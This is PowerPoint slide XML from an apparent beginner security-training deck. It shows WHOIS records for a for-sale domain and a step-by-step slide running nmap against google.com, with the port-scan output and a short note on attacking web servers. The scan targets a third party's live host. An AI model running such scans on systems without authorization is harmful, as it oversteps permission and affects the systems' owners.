          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar URL: http://www.NameBright.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Updated Date: 2020-11-15T00:00:00.000Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Creation Date: 2011-11-21T19:21:43.000Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar Registration Expiration Date: 2025-11-21T00:00:00.000Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>TurnCommerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Inc. DBA NameBright.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar IANA ID: 1441</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar Abuse Contact Email: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar Abuse Contact Phone: +1.7204960020</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>clientTransferProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> https://www.icann.org/epp#clientTransferProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registry Registrant ID: Not Available From Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4849155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FBEAD66-F68E-4DC5-99AB-805C6E53F8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041583" y="624961"/>
            <a:ext cx="6102416" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Organization: HugeDomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Street: 2635 Walnut Street</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant City: Denver</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant State/Province: CO</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Postal Code: 80205</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Country: US</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Phone: +1.3038930552</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Phone Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Fax: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Fax Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrant Email: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registry Admin ID: Not Available From Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Organization: HugeDomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Street: 2635 Walnut Street</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin City: Denver</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin State/Province: CO</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Postal Code: 80205</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Country: US</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Admin Phone: +1.3038930552</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14140534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EB41E16-3760-4ACB-B2A9-BB514AF669C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070052" y="625524"/>
            <a:ext cx="6102416" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Admin Phone Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Admin Fax: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Admin Fax Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Admin Email: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Registry Tech ID: Not Available From Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Organization: HugeDomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Street: 2635 Walnut Street</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech City: Denver</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech State/Province: CO</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Postal Code: 80205</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Country: US</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Phone: +1.3038930552</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Phone Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Fax: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Fax Ext: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tech Email: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Name Server: nsg1.namebrightdns.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Name Server: nsg2.namebrightdns.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38033860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2" y="2846564"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                   DAY -3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Finding ports on -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Step -1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Open kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Step -2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Open terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Step -3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>─(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>kali㉿kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>)-[~]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>└─$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> google.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> 7.93 ( https://nmap.org ) at 2023-07-22 07:28 EDT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> scan report for google.com (142.251.42.46)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Host is up (0.074s latency).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Other addresses for google.com (not scanned): 2404:6800:4009:826::200e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> record for 142.251.42.46: bom12s20-in-f14.1e100.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Not shown: 998 filtered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> ports (no-response)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>PORT    STATE SERVICE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>  open  http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16236990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B572842-852D-4918-A8E5-459C4FDBA031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041583" y="338252"/>
            <a:ext cx="6102416" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>443/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> open  https</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> done: 1 IP address (1 host up) scanned in 9.29 seconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>I got 2 open ports </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> http</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>443/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> https</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -5 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Using chat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gpt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> got this information about those 2 open ports </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>80 HTTP, 443 HTTPS, they are used by web servers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Can you hack something through port 80/443? It depends on the specific service that runs on</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>those ports (which specific web server, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>), and on the content which is provided by the web</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>server. Usually it's latter which is vulnerable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> injection, IDOR, look at OWASP top 10), even</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>though also the web server can be configured wrongly</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>It is used </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Port 80 is used for unencrypted web traffic and port 443 is used for encrypted web traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27815941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04355FE-1A1A-4E26-9F38-E76E711C17F8}"/>
              </a:ext>
            </a:extLst>
